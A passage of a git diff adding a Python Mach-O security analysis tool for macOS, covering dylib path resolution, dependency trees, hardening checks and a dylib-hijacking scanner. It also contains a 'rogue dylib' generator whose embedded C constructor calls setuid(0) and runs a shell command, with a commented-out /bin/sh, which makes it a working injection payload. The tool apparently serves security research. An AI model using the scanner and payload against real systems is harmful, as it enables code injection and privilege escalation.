fortified_symbols = [] + for symbol in self.binary.symbols: + symbol_name = symbol.name.lower().strip() + if ('_chk' in symbol_name) and (symbol_name not in symbol_fiter): + fortified_symbols.append(symbol_name) + return fortified_symbols + + def isFortified(self, fortified_symbols): + '''Check if there are any fortified symbols in the give fortified_symbols list.''' + if len(fortified_symbols) > 0: + return True + return False + + def hasRpath(self): + return self.binary.has_rpath +### --- IV. DYLIBS --- ### +class DylibsProcessor: + def __init__(self): + '''This class contains part of the code from the main() for the SnakeIV: Dylibs.''' + pass + + def process(self): + #try: + if args.dylibs: # Shared dylibs with unresolved paths + snake_instance.printDylibs() + if args.rpaths: # All resolved paths from LC_RPATHs + snake_instance.printRpathsResolved() + if args.rpaths_u: # All inresolved paths from LC_RPATHs + snake_instance.printRpathsUnresolved() + if args.dylibs_paths: # Resolved dylib loading paths in order they are searched for + snake_instance.printResolvedDylibPaths() + if args.dylibs_paths_u: # Unresolved dylib loading paths (same as --dylibs, but without version info) + snake_instance.printUnresolvedDylibPaths() + if args.broken_relative_paths: # Relative paths + snake_instance.printBrokenRelativePaths() + if args.dylibtree: # Dylibtree + args_dylibtree = args.dylibtree.split(',') + dylibtree = snake_instance.getDylibTree(args_dylibtree[0], args_dylibtree[1],args_dylibtree[2]) + snake_instance.printTreeFromTreelib(dylibtree) + if args.dylib_id: # Path from Dylib ID Load Command + print(snake_instance.getPathFromDylibID()) + if args.reexport_paths: # All reexported libraries paths + print(*snake_instance.getReExportPaths(), sep="\n") + if args.hijack_sec: # Check Dylib Hijacking protection on binary + print("DYLIB HIJACKIG PROTECTION: " + str(snake_instance.checkDylibHijackingProtections(file_path))) + if args.dylib_hijacking: # Direct & Indirect Dylib Hijacking check + if args.dylib_hijacking == 'default': + args.dylib_hijacking = None + all_results = snake_instance.dylibHijackingScanner(args.dylib_hijacking) + snake_instance.parseDylibHijackingScannerResults(all_results) + if args.prepare_dylib: # Compile rogue dylib + if args.prepare_dylib == 'default': + args.prepare_dylib = None + snake_instance.prepareRogueDylib(args.prepare_dylib) + #except Exception as e: + #print(f"An error occurred during SnakeIV: Dylibs processing: {e}") +class SnakeIV(SnakeIII): + def __init__(self, binaries, file_path): + super().__init__(binaries, file_path) + self.dylib_load_commands_names = { + 'LAZY_LOAD_DYLIB', + 'LOAD_DYLIB', + 'LOAD_UPWARD_DYLIB', + 'LOAD_WEAK_DYLIB', + 'PREBOUND_DYLIB', + 'REEXPORT_DYLIB', + } + self.dylib_id_path = self.getPathFromDylibID() # Get Dylib ID for @loader_path resolving + self.dylib_loading_commands, self.dylib_loading_commands_names = self.getDylibLoadCommands() # 1. Get dylib specific load commands + self.rpath_list = self.resolveRunPathLoadCommands() # 2. Get LC_RPATH list + self.absolute_paths = self.resolveDylibPaths() # 3. Get all dylib absolute paths dictionary {dylib_name[dylib_paths]} + self.dyld_share_cache_path = '/System/Volumes/Preboot/Cryptexes/OS/System/Library/dyld/dyld_shared_cache_arm64e' + + def getSharedLibraries(self, only_names=True): + '''Return array of shared libraries used by the binary. When the only_names is set to False it aslo prints compatibility and current version of each library.''' + dylibs = [] + for library in self.binary.libraries: + if only_names: + dylibs.append(library.name) + else: + formatted_compat_version = ".".join(map(str, library.compatibility_version)) + formatted_current_version = ".".join(map(str, library.current_version)) + dylibs.append(f"{library.name} (compatibility version: {formatted_compat_version}, current version: {formatted_current_version})") + return dylibs + + def getDylibLoadCommands(self): + '''Return a list of load commands that load dylibs.''' + dylib_loading_commands = [] + dylib_loading_commands_names = [] + + for cmd in self.load_commands: + cmd_name = cmd.command.name + if cmd_name in self.dylib_load_commands_names: + dylib_loading_commands.append(cmd) + dylib_loading_commands_names.append(cmd_name) + + return dylib_loading_commands, dylib_loading_commands_names + + def getUnresolvedRunPathLoadCommandsPaths(self): + ''' + Return a list of unresolved paths (like @executable_path/Frameworks) from LC_RPATH load commands. Example return: + ['/usr/lib/swift', '@executable_path/Frameworks', '@loader_path/Frameworks'] + ''' + return [cmd.path for cmd in self.load_commands if cmd.command.name == 'RPATH'] + + def resolveRunPathLoadCommands(self): + ''' + Return a list of resolved (absolute) paths from LC_RPATH. Example return: + ['/usr/lib/swift', '/Applications/Suunto.app/WrappedBundle/Frameworks', '/Applications/Suunto.app/WrappedBundle/Frameworks'] + ''' + executable_path = os.path.dirname(self.file_path) + if self.dylib_id_path: + loader_path = self.dylib_id_path + else: + loader_path = executable_path + + unresolved_LC_RPATHS = self.getUnresolvedRunPathLoadCommandsPaths() + LC_RPATHS = [] + for path in unresolved_LC_RPATHS: + if path.startswith('@executable_path'): + path = path.replace('@executable_path',executable_path) + LC_RPATHS.append(path) + elif path.startswith('@loader_path'): + path = path.replace('@loader_path',loader_path) + LC_RPATHS.append(path) + else: + LC_RPATHS.append(path) + return LC_RPATHS + + def extractPathFromDylibLoadCommandStruct(self, dylib_load_command): + '''Extracts the string path from a dylib load command structure.''' + cmd_data = bytes(dylib_load_command.data) + offset_data = cmd_data[8:] + offset = int.from_bytes(offset_data[:4], byteorder=self.endianess) + string_data = cmd_data[offset:] + null_index = string_data.find(0) + path_bytes = string_data[:null_index] + path_string = path_bytes.decode('utf-8') + return path_string + + def resolveRunPathPaths(self, path): + ''' + Return ordered list of resolved @rpaths for the given dylib path. + Example return for self.rpath_list = ['/1/', '/2/'] and dylib path = @rpath/test.dylib + [ '/1/test.dylib', '/2/test.dylib'] + ''' + resolved_rpaths = [] + for rpath in self.rpath_list: + resolved_rpaths.append(path.replace('@rpath',rpath)) + return resolved_rpaths + + def resolveDylibPaths(self): + ''' + Return a dictionary of dylib_name : dylib_absolute_paths + Paths are absolute (with resolved @rpath, @executable_path, @loader_path) + ''' + executable_path = os.path.dirname(self.file_path) + if self.dylib_id_path: + loader_path = self.dylib_id_path + else: + loader_path = executable_path + absolute_paths = {} + + for dylib_load_command in self.dylib_loading_commands: + path = self.extractPathFromDylibLoadCommandStruct(dylib_load_command) + name = os.path.basename(path) + + if name not in absolute_paths: + absolute_paths[name] = [] + + if path.startswith('@executable_path'): + path = path.replace('@executable_path', executable_path) + absolute_paths[name].append(path) + + elif path.startswith('@rpath'): + paths = self.resolveRunPathPaths(path) + absolute_paths[name].extend(paths) + + elif path.startswith('@loader_path'): + path = path.replace('@loader_path', loader_path) + absolute_paths[name].append(path) + + else: + absolute_paths[name].append(path) + + return absolute_paths + + def checkBrokenRelativeDylibSource(self): + ''' + Check for bad dylib source. + When Dylib is relative, but does not use @executable_path | @loader_path | @rpath. + For example: mylib.dylib instead of @executable_path/mylib.dylib + ''' + broken_relative_dylibs = [] + for _, paths in self.absolute_paths.items(): # Iterate dylibs:paths dictionary + for path in paths: + if not path.startswith('/'): + broken_relative_dylibs.append(path) + + return broken_relative_dylibs + + def checkIfPathExists(self, path): + '''Check if specified path exists on the filesystem.''' + return os.path.exists(path) + + def checkIfPathExistsInDyldSharedCache(self, path, extracted_dyld_share_cache_directory_path): + '''Return if the path exists in the DSC - you must first extract it.''' + path = os.path.abspath(extracted_dyld_share_cache_directory_path) + "/" + path + return self.checkIfPathExists(path) + + def runDyldSharedCacheExtractor(self, dyld_share_cache_path, extracted_output_path): + '''Run dyld-shared-cache-extractor command.''' + command = ['dyld-shared-cache-extractor', dyld_share_cache_path, extracted_output_path] + subprocess.run(command, check=True) + + def getDylibTree(self, dyld_share_cache_path=None, extracted_output_path=None, is_extracted=0): + '''A function that inspects the dynamic dependencies of a Mach-O binary recursively (like recursive otool -L). You must use absolute path in --path if you are using --dylibtree from extracted Dyld Shared Cache.''' + if dyld_share_cache_path in [None, '']: + dyld_share_cache_path = self.dyld_share_cache_path + + if extracted_output_path in [None, '']: + extracted_output_path = 'extracted_dyld_share_cache/' + extracted_output_path = os.path.abspath(extracted_output_path) # Convert to absolute path + + if is_extracted == '0': + self.runDyldSharedCacheExtractor(dyld_share_cache_path, extracted_output_path) + + dylibtree = treelib.Tree() + path_to_process = [self.file_path] + already_checked_paths = [] + not_existing_paths = [] # It could be the already_checked_paths for optimization, but for code clarity it stay. + node_id = 0 + dylibtree.create_node(self.file_path, node_id) + + while path_to_process: + current_path = path_to_process.pop() + + if (current_path not in path_to_process) and (current_path not in already_checked_paths) and (current_path not in not_existing_paths): + fat_binary = lief.MachO.parse(current_path) + dylib_snake_instance = SnakeIV(fat_binary, current_path) + + if current_path.startswith(extracted_output_path): + current_path = current_path.removeprefix(extracted_output_path) + + for _, dylib_paths in dylib_snake_instance.absolute_paths.items(): + for path in dylib_paths: # All dylibs for current binary (current_path from existing_path_to_process) + absolute_path = os.path.abspath(path) + node_id += 1 + filtered_nodes = list(dylibtree.filter_nodes(lambda node: node.tag == current_path)) + nid_of_first_occurance_of_dylib_in_dylibtree = filtered_nodes[0].identifier + # If path exist on the filesystem or DSC, add as a leaf to tree + ## current_path(root) -> absolute_path(leaf) + if absolute_path not in path_to_process: + if dylib_snake_instance.checkIfPathExists(absolute_path): + path_to_process.append(absolute_path) # Add this path to process recursively in while loop + dylibtree.create_node(absolute_path, node_id, parent=nid_of_first_occurance_of_dylib_in_dylibtree) # Add a path as a leaf + elif dylib_snake_instance.checkIfPathExistsInDyldSharedCache(path, extracted_output_path): + dsc_path = extracted_output_path + path + path_to_process.append(dsc_path) + dylibtree.create_node(absolute_path, node_id, data='\033[94mDSC\033[0m', parent=nid_of_first_occurance_of_dylib_in_dylibtree) # Add a path as a leaf + else: + not_existing_paths.append(absolute_path) + dylibtree.create_node(absolute_path, node_id, data='\033[91mWARNING - not existing path\033[0m', parent=nid_of_first_occurance_of_dylib_in_dylibtree) + + # If the node path (current_path) was checked, it should not be unwind again. + already_checked_paths.append(current_path) + already_checked_paths.append(extracted_output_path + current_path) + + return dylibtree + + def getDylibID(self): + ''' + Return a LC_ID_DYLIB Load Command if exists. + Dyld additionally check if the FILE TYPE == MH_DYLIB. + I intentionally omit this step to always extract ID. + ''' + for cmd in self.load_commands: + if cmd.command.name == 'ID_DYLIB': + return cmd + return None + + def getPathFromDylibID(self): + '''Return a path stored inside the Dylib ID Load Command.''' + dylib_id_lc = self.getDylibID() + if dylib_id_lc: + return self.extractPathFromDylibLoadCommandStruct(dylib_id_lc) + return None + + def printTreeFromTreelib(self, tree): + ''' + Helper function for printing the dylibtree. + It will only work with this structure because the root id is equal to 0 (tree.get_node(0)), which is not always true. + I had to write this to make pretty printing with data work because, by default, tree limb does not support printing with data. + Data is needed to show warnings if any library is missing on the filesystem and to inform if the library was from Dyld Share Cachce. + ''' + def recursivePrint(node, prefix="", last=True): + data_str = f": {node.data}" if node.data else "" + print(f"{prefix}{'`-- ' if last else '|-- '}{node.tag}{data_str}") + + children = tree.children(node.identifier) + count = len(children) + + for i, child in enumerate(children): + is_last = i == count - 1 + child_prefix = f"{prefix}{' ' if last else '| '}" + recursivePrint(child, child_prefix, is_last) + + root = tree.get_node(0) + recursivePrint(root) + + def printDylibs(self): + print(f"{self.file_path} depends on libraries:") + for d in self.getSharedLibraries(only_names=False): + print(f"\t{d}") + + def printRpathsResolved(self): + '''Print all paths that @rpath can be resolved to.''' + print(*self.rpath_list, sep="\n") + + def printRpathsUnresolved(self): + print(*self.getUnresolvedRunPathLoadCommandsPaths(), sep="\n") + + def printResolvedDylibPaths(self): + '''Prints all resolved (absolute) dylib loading commands paths.''' + for _, dylib_paths in self.absolute_paths.items(): + print(*dylib_paths, sep='\n') + + def printUnresolvedDylibPaths(self): + '''Prints all unresolved (with @rpath|@executable_path|@loader_path) dylib loading commands paths.''' + for dylib_load_command in self.dylib_loading_commands: + print(self.extractPathFromDylibLoadCommandStruct(dylib_load_command)) + + def printBrokenRelativePaths(self): + '''Print 'broken' relative paths from the binary (cases where the dylib source is specified for an executable directory without @executable_path)''' + for broken_path in self.checkBrokenRelativeDylibSource(): + print(broken_path) + + def getMissingPaths(self): + ''' + Return two unique lists of missing and existing paths. + ''' + missing_paths = [] + existing_paths = [] + for _, paths in self.absolute_paths.items(): + for path in paths: + if os.path.exists(path): + existing_paths.append(path) + break # Stop checking further paths for this dylib + else: + missing_paths.append(path) + unique_missing = list(set(missing_paths)) + unique_existing = list(set(existing_paths)) + return unique_missing, unique_existing + + def checkWriteAccessMissing(self, paths): + ''' + Check write access for the given paths. + In case the directory does not exists, traverse back till directory that exists and check write access there. + Return a list of writeable directories. + ''' + write_accessible_paths = [] + for path in paths: + current_path = path + if os.access(current_path, os.W_OK): + write_accessible_paths.append(path) + continue + while current_path: + current_path = os.path.dirname(current_path) + if not os.path.exists(current_path): + continue + if os.access(current_path, os.W_OK): + write_accessible_paths.append(path) + break + else: + break + + return write_accessible_paths + + def checkWriteAccessExisting(self, paths): + '''Return a list of write-accessible paths.''' + write_accessible_paths = [] + for path in paths: + if os.access(path, os.W_OK): + write_accessible_paths.append(path) + + return write_accessible_paths + + def hasLibraryValidationFlag(self, file_path): + '''Check Library validation flag for given binary.''' + if b'library-validation' in self.getCodeSignature(file_path): + return True + return False + + def hasDisableLibraryValidationEntitlement(self, file_path): + '''Checks if the binary has com.apple.security.cs.disable-library-validation or com.apple.private.security.clear-library-validation entitlement set, which allows loading dylibs without requiring code signing.''' + if self.checkIfEntitlementIsUsed('com.apple.security.cs.disable-library-validation', 'true', file_path) or self.checkIfEntitlementIsUsed('com.apple.private.security.clear-library-validation','true', file_path): + return True + return False + + def getDyldSharedCacheDylibsPaths(self, dsc_path): + ''' + Parse Dyld Shared Cache using ipsw to extract dylib paths. + Ref: https://blacktop.github.io/ipsw/docs/guides/dyld/ + ''' + if dsc_path == None: + dsc_path = self.dyld_share_cache_path + + command = f"ipsw dyld info {dsc_path} -l -j >> /tmp/dyld_shared_cache_temp_1234.json" + subprocess.run(command, shell=True, check=True) + + with open('/tmp/dyld_shared_cache_temp_1234.json', 'r') as file: + data = json.load(file) + os.remove('/tmp/dyld_shared_cache_temp_1234.json') + + # jq -r '.dylibs[].name' dsc.json + paths = [dylib['name'] for dylib in data.get('dylibs', [])] + return paths + + def printDyldSharedCacheDylibsPaths(self, dsc_path): + '''Print Dyld paths from Dyld Shared Cache.''' + if dsc_path == None: + dsc_path = self.dyld_share_cache_path + + paths = self.getDyldSharedCacheDylibsPaths(dsc_path) + for path in paths: + print(path) + + def checkDylibHijackingProtections(self, file_path): + '''Check protections against dylib hijacking.''' + + # Check if 'com.apple.security.cs.disable-library-validation' or 'com.apple.private.security.clear-library-validation' entitlements are present and set to true - INSECURE. + has_insecure_entitlement = self.hasDisableLibraryValidationEntitlement(file_path) + + # Check if Library validation or Hardened runtime is active - SECURE + is_hardened_runtime_active = self.hasHardenedRuntimeFlag(file_path) + is_library_validation_active = self.hasLibraryValidationFlag(file_path) + + if has_insecure_entitlement: # Entitlements disables protections + return False + elif is_hardened_runtime_active or is_library_validation_active: # If there are no entitlements and HR or LV exists, then protections is ON + return True + else: # If there are no insecure entitlements, but there are also no HR or LV, there are no protections + return False + + def dylibHijackingScanner(self, dyld_share_cache_path): + '''Direct and Indirect Dylib Hijacking Scanner - return dictionary of results for main binary and each dependancy.''' + + if dyld_share_cache_path in [None, '']: + dyld_share_cache_path = self.dyld_share_cache_path + + dsc_paths = self.getDyldSharedCacheDylibsPaths(dyld_share_cache_path) + already_checked_paths = [] + all_results = {} + path_to_process = [self.file_path] + + while path_to_process: + current_path = path_to_process.pop() + + result = { + 'is_protected' : bool, + 'writeable_missing_paths' : [], + 'writeable_existing_paths' : [] + } + + if (current_path not in already_checked_paths) and (current_path not in dsc_paths): + fat_binary = lief.MachO.parse(current_path) + dylib_snake_instance = SnakeIV(fat_binary, current_path) + + missing_paths, existing_paths = dylib_snake_instance.getMissingPaths() + result['writeable_missing_paths'] = dylib_snake_instance.checkWriteAccessMissing(missing_paths) + result['writeable_existing_paths'] = dylib_snake_instance.checkWriteAccessExisting(existing_paths) + result['is_protected'] = dylib_snake_instance.checkDylibHijackingProtections(dylib_snake_instance.file_path) + + already_checked_paths.append(current_path) + path_to_process.extend(existing_paths) + all_results[current_path] = result + return all_results + + def parseDylibHijackingScannerResults(self, all_results): + '''Print the dylibHijackingScanner results in a nice format.''' + for current_path, result in all_results.items(): + if result['is_protected']: + print(f"{current_path}: \033[92mPROTECTED\033[0m") + else: + print(f"{current_path}: \033[91mNOT PROTECTED\033[0m") + if result['writeable_existing_paths']: + print(f"\033[91m[!] WRITEABLE EXISTING PATHS\033[0m: {', '.join(map(str, result['writeable_existing_paths']))}") + if result['writeable_missing_paths']: + print(f"\033[91m[!] WRITEABLE MISSING PATHS\033[0m: {', '.join(map(str, result['writeable_missing_paths']))}") + print("-"*28) + + def getReExportLoadCommands(self): + ''' + Return a list of REEXPORT_DYLIB Load Commands if exists. + ''' + reexport_load_commands = [] + for cmd in self.load_commands: + if cmd.command.name == 'REEXPORT_DYLIB': + reexport_load_commands.append(cmd) + return reexport_load_commands + + def getReExportPaths(self): + '''Return paths stored inside the REEXPORT_DYLIB Load Commands.''' + reexport_load_commands = self.getReExportLoadCommands() + paths = [] + if reexport_load_commands: + for load_command in reexport_load_commands: + paths.append(self.extractPathFromDylibLoadCommandStruct(load_command)) + return paths + + def getImportedSymbols(self, target_library_path): + ''' + It works on the dylib specified in the --path. + Returns the imported symbols from the external library (target_library_path) + DYLIB_ID of the target_library_path must be equal to the path in order to work properly. + https://lief-project.github.io/doc/stable/api/python/macho.html#binary + https://lief-project.github.io/doc/stable/api/python/macho.html#binding-info + https://lief-project.github.io/doc/stable/api/python/macho.html#dylibcommand + ''' + if target_library_path: + imported_symbols = [] + for symbol in self.binary.imported_symbols: + if symbol.binding_info.library.name == target_library_path: + imported_symbols.append(symbol.name) + return imported_symbols + + def prepareRogueDylib(self, target_library_path): + ''' + Compile m.dylib which by default: + 1. Prints log about successful injection to stdout & stderr syslog. + 2. If the binary is SUID, sets RUID to EUID and prints user ID. + ''' + file_name_c = 'm.c' + source_code = SourceCodeManager.dylib_hijacking + output_filename = 'm.dylib' + flag_list = ['-dynamiclib'] + imported_sybols = self.getImportedSymbols(target_library_path) + if imported_sybols: + for symbol in imported_sybols: + symbol = symbol.lstrip('_') + function_to_add = f'\nvoid {symbol}(void){{}}' + source_code += function_to_add + + SourceCodeManager.clangCompilerWrapper(file_name_c, source_code, output_filename, flag_list) +### --- ARGUMENT PARSER --- ### +class ArgumentParser: + def __init__(self): + '''Class for parsing arguments from the command line. I decided to remove it from main() for additional readability and easier code maintenance in the VScode''' + self.parser = argparse.ArgumentParser(description="Mach-O files parser for binary analysis") + self.addGeneralArgs() + self.addMachOArgs() + self.addCodeSignArgs() + self.addChecksecArgs() + self.addDylibsArgs() + + def addGeneralArgs(self): + self.parser.add_argument('-p', '--path', required=True, help="Path to the Mach-O file") + + def addMachOArgs(self): + macho_group = self.parser.add_argument_group('MACH-O ARGS') + macho_group.add_argument('--file_type', action='store_true', help="Print binary file type") + macho_group.add_argument('--header_flags', action='store_true', help="Print binary header flags") + macho_group.add_argument('--endian', action='store_true', help="Print binary endianess") + macho_group.add_argument('--header', action='store_true', help="Print binary header") + macho_group.add_argument('--load_commands', action='store_true', help="Print binary load commands names") + macho_group.add_argument('--segments', action='store_true', help="Print binary segments in human-friendly form") + macho_group.add_argument('--sections', action='store_true', help="Print binary sections in human-friendly form") + macho_group.add_argument('--symbols', action='store_true', help="Print all binary symbols") + macho_group.add_argument('--chained_fixups', action='store_true', help="Print Chained Fixups information") + macho_group.add_argument('--exports_trie', action='store_true', help="Print Export Trie information") + macho_group.add_argument('--uuid', action='store_true', help="Print UUID") + macho_group.add_argument('--main', action='store_true', help="Print entry point and stack size") + macho_group.add_argument('--encryption_info', nargs='?',const='', help="Print encryption info if any. Optionally specify an output path to dump the encrypted data (if cryptid=0, data will be in plain text)", metavar="(optional) save_path.bytes") + macho_group.add_argument('--strings_section', action='store_true', help="Print strings from __cstring section") + macho_group.add_argument('--all_strings', action='store_true', help="Print strings from all sections") + macho_group.add_argument('--save_strings', help="Parse all sections, detect strings, and save them to a file", metavar='all_strings.txt') + macho_group.add_argument('--info', action='store_true', default=False, help="Print header, load commands, segments, sections, symbols, and strings") + + def addCodeSignArgs(self): + codesign_group = self.parser.add_argument_group('CODE SIGNING ARGS') + codesign_group.add_argument('--verify_signature', action='store_true', default=False, help="Code Signature verification (if the contents of the binary have been modified)") + codesign_group.add_argument('--cd_info', action='store_true', default=False, help="Print Code Signature information") + codesign_group.add_argument('--cd_requirements', action='store_true', default=False, help="Print Code Signature Requirements") + codesign_group.add_argument('--entitlements', help="Print Entitlements in a human-readable, XML, or DER format (default: human)", nargs='?', const='human', metavar='human|xml|var') + codesign_group.add_argument('--extract_cms', help="Extract CMS Signature from the Code Signature and save it to a given file", metavar='cms_signature.der') + codesign_group.add_argument('--extract_certificates', help="Extract Certificates and save them to a given file. To each filename will be added an index at the end: _0 for signing, _1 for intermediate, and _2 for root CA certificate", metavar='certificate_name') + codesign_group.add_argument('--remove_sig', help="Save the new file on a disk with removed signature", metavar='unsigned_binary') + codesign_group.add_argument('--sign_binary', help="Sign binary using specified identity - use : 'security find-identity -v -p codesigning' to get the identity (default: adhoc)", nargs='?', const='adhoc', metavar='adhoc|identity_number') + + def addChecksecArgs(self): + checksec_group = self.parser.add_argument_group('CHECKSEC ARGS') + checksec_group.add_argument('--has_pie', action='store_true', default=False, help="Check if Position-Independent Executable (PIE) is set") + checksec_group.add_argument('--has_arc', action='store_true', default=False, help="Check if Automatic Reference Counting (ARC) is in use (can be false positive)") + checksec_group.add_argument('--is_stripped', action='store_true', default=False, help="Check if binary is stripped") + checksec_group.add_argument('--has_canary', action='store_true', default=False, help="Check if Stack Canary is in use (can be false positive)") + checksec_group.add_argument('--has_nx_stack', action='store_true', default=False, help="Check if stack is non-executable (NX stack)") + checksec_group.add_argument('--has_nx_heap', action='store_true', default=False, help="Check if heap is non-executable (NX heap)") + checksec_group.add_argument('--has_xn', action='store_true', default=False, help="Check if binary is protected by eXecute Never (XN) ARM protection") + checksec_group.add_argument('--is_notarized', action='store_true', default=False, help="Check if the application is notarized and can pass the Gatekeeper verification") + checksec_group.add_argument('--is_encrypted', action='store_true', default=False, help="Check if the application is encrypted (has LC_ENCRYPTION_INFO(_64) and cryptid set to 1)") + checksec_group.add_argument('--has_restrict', action='store_true', default=False, help="Check if binary has __RESTRICT segment") + checksec_group.add_argument('--is_hr', action='store_true', default=False, help="Check if the Hardened Runtime is in use") + checksec_group.add_argument('--is_as', action='store_true', default=False, help="Check if the App Sandbox is in use") + checksec_group.add_argument('--is_fort', action='store_true', default=False, help="Check if the binary is fortified") + checksec_group.add_argument('--has_rpath', action='store_true', default=False, help="Check if the binary utilise any @rpath variables") + checksec_group.add_argument('--checksec', action='store_true', default=False, help="Run all checksec module options on the binary") + + def addDylibsArgs(self): + dylibs_group = self.parser.add_argument_group('DYLIBS ARGS') + dylibs_group.add_argument('--dylibs', action='store_true', default=False, help="Print shared libraries used by specified binary with compatibility and the current version (loading paths unresolved, like @rpath/example.dylib)") + dylibs_group.add_argument('--rpaths', action='store_true', default=False, help="Print all paths (resolved) that @rpath can be resolved to") + dylibs_group.add_argument('--rpaths_u', action='store_true', default=False, help="Print all paths (unresolved) that @rpath can be resolved to") + dylibs_group.add_argument('--dylibs_paths', action='store_true', default=False, help="Print absolute dylib loading paths (resolved @rpath|@executable_path|@loader_path) in order they are searched for") + dylibs_group.add_argument('--dylibs_paths_u', action='store_true', default=False, help="Print unresolved dylib loading paths.") + dylibs_group.add_argument('--broken_relative_paths', action='store_true', default=False, help="Print 'broken' relative paths from the binary (cases where the dylib source is specified for an executable directory without @executable_path)") + dylibs_group.add_argument('--dylibtree', metavar=('cache_path,output_path,is_extracted'), nargs = '?', const=",,0", help='Print the dynamic dependencies of a Mach-O binary recursively. You can specify the Dyld Shared Cache path in the first argument, the output directory as the 2nd argument, and if you have already extracted DSC in the 3rd argument (0 or 1). The output_path will be used as a base for dylibtree. For example, to not extract DSC, use: --dylibs ",,1", or to extract from default to default use just --dylibs or --dylibs ",,0" which will extract DSC to extracted_dyld_share_cache/ in the current directory') + dylibs_group.add_argument('--dylib_id', action='store_true', default=False, help="Print path from LC_ID_DYLIB") + dylibs_group.add_argument('--reexport_paths', action='store_true', default=False, help="Print paths from LC_REEXPORT_DLIB") + dylibs_group.add_argument('--hijack_sec', action='store_true', default=False, help="Check if binary is protected against Dylib Hijacking") + dylibs_group.add_argument('--dylib_hijacking', metavar='cache_path' ,nargs="?", const="default", help="Check for possible Direct and Indirect Dylib Hijacking loading paths. (optional) Specify the path to the Dyld Shared Cache") + dylibs_group.add_argument('--prepare_dylib', metavar='target_dylib_path' ,nargs="?", const="default", help="Compile rogue dylib. (optional) Specify target_dylib_path, it will search for the imported symbols from it in the dylib specified in the --path argument and automatically add it to the source code of the rogue lib. Example: --path lib1.dylib --prepare_dylib /path/to/lib2.dylib") + + + + def parseArgs(self): + return self.parser.parse_args() + + def printAllArgs(self, args): + '''Just for debugging. This method is a utility designed to print all parsed arguments and their corresponding values.''' + for arg, value in vars(args).items(): + print(f"{arg}: {value}") +### --- SOURCE CODE --- ### +class SourceCodeManager: + dylib_hijacking = r''' +// clang -dynamiclib m.c -o m.dylib //-o $PWD/TARGET_DYLIB +#include +#include +#include +#include + +__attribute__((constructor)) +void myconstructor(int argc, const char **argv) +{ + syslog(LOG_ERR, "[+] m.dylib injected in %s\n", argv[0]); + printf("[+] m.dylib injected in %s\n", argv[0]); + setuid(0); + system("id"); + //system("/bin/sh"); +} +''' + @staticmethod + def clangCompilerWrapper(file_name_c, source_code, output_filename, flag_list=None): + # Save the source code to a file + with open(file_name_c, "w") as source_file: + source_file.write(source_code) + + # Compile the source code using clang + clang_command = ["clang", file_name_c, "-o", output_filename, *flag_list] + subprocess.run(clang_command, check=True) + +if __name__ == "__main__": + arg_parser = ArgumentParser() + args = arg_parser.parseArgs() + + file_path = os.path.abspath(args.path) + + ### --- I. MACH-O --- ### + macho_processor = MachOProcessor(file_path) + macho_processor.process() + + ### --- II. CODE SIGNING --- ### + code_signing_processor = CodeSigningProcessor() + code_signing_processor.process() + + ### --- III. CHECKSEC --- ### + checksec_processor = ChecksecProcessor() + checksec_processor.process() + + ### --- IV. DYLIBS --- ### + dylibs_processor = DylibsProcessor() + dylibs_processor.process() \ No newline at end of file diff --git a/IV. Dylibs/python/MachODylibLoadCommandsFinder.py b/IV. Dylibs/python/MachODylibLoadCommandsFinder.py new file mode 100644 index 0000000..0df67f7 --- /dev/null +++ b/IV. Dylibs/python/MachODylibLoadCommandsFinder.py @@ -0,0 +1,100 @@ +#!/usr/bin/env python3 +import os +import lief + + +class MachODylibLoadCommandsFinder: + ''' + Recursively crawl the system and parse Mach-O files to find DYLIB related load commands. + 1. Check if the file is a Mach-O. + 2. List all Load Commands. + 3. Check if any DYLIB-related LC exists. + LC_LOAD_DYLIB + LC_ID_DYLIB + LC_PREBOUND_DYLIB + LC_LOAD_WEAK_DYLIB + LC_REEXPORT_DYLIB + LC_LAZY_LOAD_DYLIB + LC_LOAD_UPWARD_DYLIB + LC_RPATH + 4. Print the total Mach-O files analyzed and how many DYLIB-related LCs existed. + ''' + def __init__(self): + self.total_files_analyzed = 0 + self.binary_dylibs = {} + self.dylib_counts = { + "LC_LOAD_DYLIB" : 0, + "LC_ID_DYLIB": 0, + "LC_PREBOUND_DYLIB": 0, + "LC_LOAD_WEAK_DYLIB": 0, + "LC_REEXPORT_DYLIB": 0, + "LC_LAZY_LOAD_DYLIB": 0, + "LC_LOAD_UPWARD_DYLIB": 0, + "LC_RPATH": 0, + } + + def parseDirectory(self, directory_path): + '''Recursively check if the path is a file. If it is, use checkIfMacho method.''' + for root, dirs, files in os.walk(directory_path): + for file in files: + file_path = os.path.join(root, file) + if os.path.isfile(file_path): + self.checkIfMacho(file_path) + + def checkIfMacho(self, file_path): + binaries = lief.MachO.parse(file_path) + if binaries: + self.parseFatBinary(binaries, file_path) + + def parseFatBinary(self, binaries, file_path): + for binary in binaries: + if binary.header.cpu_type == lief.MachO.CPU_TYPES.ARM64: + self.total_files_analyzed += 1 + self.checkDylibLoadCommands(binary, file_path) + + def checkDylibLoadCommands(self, binary, file_path): + dylib_related_lcs = { + lief.MachO.LOAD_COMMAND_TYPES.LOAD_DYLIB: "LC_LOAD_DYLIB", + lief.MachO.LOAD_COMMAND_TYPES.ID_DYLIB: "LC_ID_DYLIB", + lief.MachO.LOAD_COMMAND_TYPES.PREBOUND_DYLIB: "LC_PREBOUND_DYLIB", + lief.MachO.LOAD_COMMAND_TYPES.LOAD_WEAK_DYLIB: "LC_LOAD_WEAK_DYLIB", + lief.MachO.LOAD_COMMAND_TYPES.REEXPORT_DYLIB: "LC_REEXPORT_DYLIB", + lief.MachO.LOAD_COMMAND_TYPES.LAZY_LOAD_DYLIB: "LC_LAZY_LOAD_DYLIB", + lief.MachO.LOAD_COMMAND_TYPES.LOAD_UPWARD_DYLIB: "LC_LOAD_UPWARD_DYLIB", + lief.MachO.LOAD_COMMAND_TYPES.RPATH: "LC_RPATH", + } + + binary_dylibs_set = set() + + for cmd in binary.commands: + if cmd.command in dylib_related_lcs: + lc_name = dylib_related_lcs[cmd.command] + self.dylib_counts[lc_name] += 1 + binary_dylibs_set.add(lc_name) + + self.binary_dylibs[file_path] = binary_dylibs_set + + def print_results(self): + print(f"Total Mach-O files analyzed: {self.total_files_analyzed}") + print("DYLIB-related LC counts:") + for lc, count in self.dylib_counts.items(): + print(f"{lc}: {count}") + + print("\nBinary Dylibs:") + for binary, dylibs in self.binary_dylibs.items(): + print(f"{binary}: {dylibs}") + + def save_results(self): + with open("MachODylibLoadCommandsFinder_results.txt", "a") as f: + f.write(f"Total Mach-O files analyzed: {self.total_files_analyzed}\n") + f.write("DYLIB-related LC counts:\n") + for lc, count in self.dylib_counts.items(): + f.write(f"{lc}: {count}\n") 